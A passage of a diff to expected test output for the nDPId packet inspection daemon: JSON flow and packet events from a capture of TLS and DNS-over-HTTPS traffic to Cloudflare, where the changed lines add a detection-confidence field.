 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604822444624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1604822444624,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGHZtoEPn5wKgBdwG7yZbnV+zfHVNGaoAS\/\/9HygAAAgQFeAEBBAIBAwMK"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604822444624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1604822444624,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGFqfAqAF3aBD5+cmWAbsdU0Zq51fs4FAQEAB4YwAA"}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444486,"flow_last_seen":1604822444629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":616,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":154,"midstream":0,"ts_msec":1604822444629,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1604822444486,"flow_last_seen":1604822444807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":1474,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1604822444807,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"mozilla.cloudflare-dns.com","ja3":"f14ec85ee5580a29f6523e24e5d3d527","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822444913,"flow_last_seen":1604822444913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1604822444913,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1604822444913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1604822444913,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGlCjAqAF3aBB8YMmcAbs\/DuN6AAAAALAC\/\/+FPgAAAgQFtAEDAwYBAQgKKlLy+gAAAAAEAgAA"}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1604822445034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1604822445034,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADkGmzRoEHxgwKgBdwG7yZyEa\/jPPw7je4AS\/\/9djQAAAgQFeAEBBAIBAwMK"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1604822445034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1604822445034,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGlEDAqAF3aBB8YMmcAbs\/DuN7hGv40FAQEACOJgAA"}
-00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822444913,"flow_last_seen":1604822445039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":947,"flow_avg_l4_payload_len":236,"midstream":0,"ts_msec":1604822445039,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":47,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822444913,"flow_last_seen":1604822445135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":947,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":196,"midstream":0,"ts_msec":1604822445135,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"","ja3":"76ec527d45e3a2a9093484446d7d3264","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447227,"flow_last_seen":1604822447227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1604822447227,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1604822447227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1604822447227,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGSmLAqAF3aBHGJcmzAbtjbUROAAAAALAC\/\/+t4gAAAgQFtAEDAwYBAQgKKlL7RgAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604822447249,"flow_last_seen":1604822447249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1604822447249,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -27,33 +27,33 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1604822447287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1604822447287,"pkt":"EBMxuRBeeDHBvV4kCABFAABAAABAAEAGx9jAqAF3aBZIqsm3AbsAL2HpAAAAALAC\/\/9wxQAAAgQFtAEDAwYBAQgKKlL7eQAAAAAEAgAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1604822447311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1604822447311,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybNKGfaqY21ET4AS\/\/\/K9AAAAgQFeAEBBAIBAwMK"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1604822447311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1604822447311,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcmzAbtjbURPShn2q1AQEAD7jQAA"}
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447227,"flow_last_seen":1604822447321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1604822447321,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1604822447325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1604822447325,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADcGU25oEcYlwKgBdwG7ybQgqbhsGMRIBoAS\/\/95lAAAAgQFeAEBBAIBAwMK"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1604822447325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1604822447325,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGSnrAqAF3aBHGJcm0AbsYxEgGIKm4bVAQEACqLQAA"}
-00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":822,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447249,"flow_last_seen":1604822447330,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1604822447330,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1604822447368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1604822447368,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybVDiAdt8KRa8oAS\/\/+aXQAAAgQFeAEBBAIBAwMK"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1604822447369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1604822447369,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm1AbvwpFryQ4gHblAQEADK9gAA"}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1604822447370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1604822447370,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybbraGnySz6LGIAS\/\/8FNwAAAgQFeAEBBAIBAwMK"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1604822447370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1604822447370,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm2AbtLPosY62hp81AQEAA10AAA"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1604822447373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1604822447373,"pkt":"eDHBvV4kEBMxuRBeCABFAAA0AABAADQG0+RoFkiqwKgBdwG7ybcBQwC0AC9h6oAS\/\/\/M1wAAAgQFeAEBBAIBAwMK"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1604822447373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1604822447373,"pkt":"EBMxuRBeeDHBvV4kCABFAAAoAABAAEAGx\/DAqAF3aBZIqsm3AbsAL2HqAUMAtVAQEAD9cAAA"}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":829,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447374,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1604822447374,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":840,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1604822447380,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51639,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":841,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1604822447287,"flow_last_seen":1604822447386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":712,"flow_tot_l4_payload_len":712,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1604822447386,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51638,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"62a4a00de930bd0a5bee0309cc8362ed","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":843,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447227,"flow_last_seen":1604822447412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1604822447412,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-cf.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":882,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447249,"flow_last_seen":1604822447447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1604822447447,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"951c558a-5e07-47ca-a0c0-225da1b33163.is-doh.help.every1dns.net","ja3":"aa7744226c695c0b2e440419848cf700","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":944,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1604822447287,"flow_last_seen":1604822447500,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2172,"flow_avg_l4_payload_len":362,"midstream":0,"ts_msec":1604822447500,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.22.72.170","src_port":51637,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": 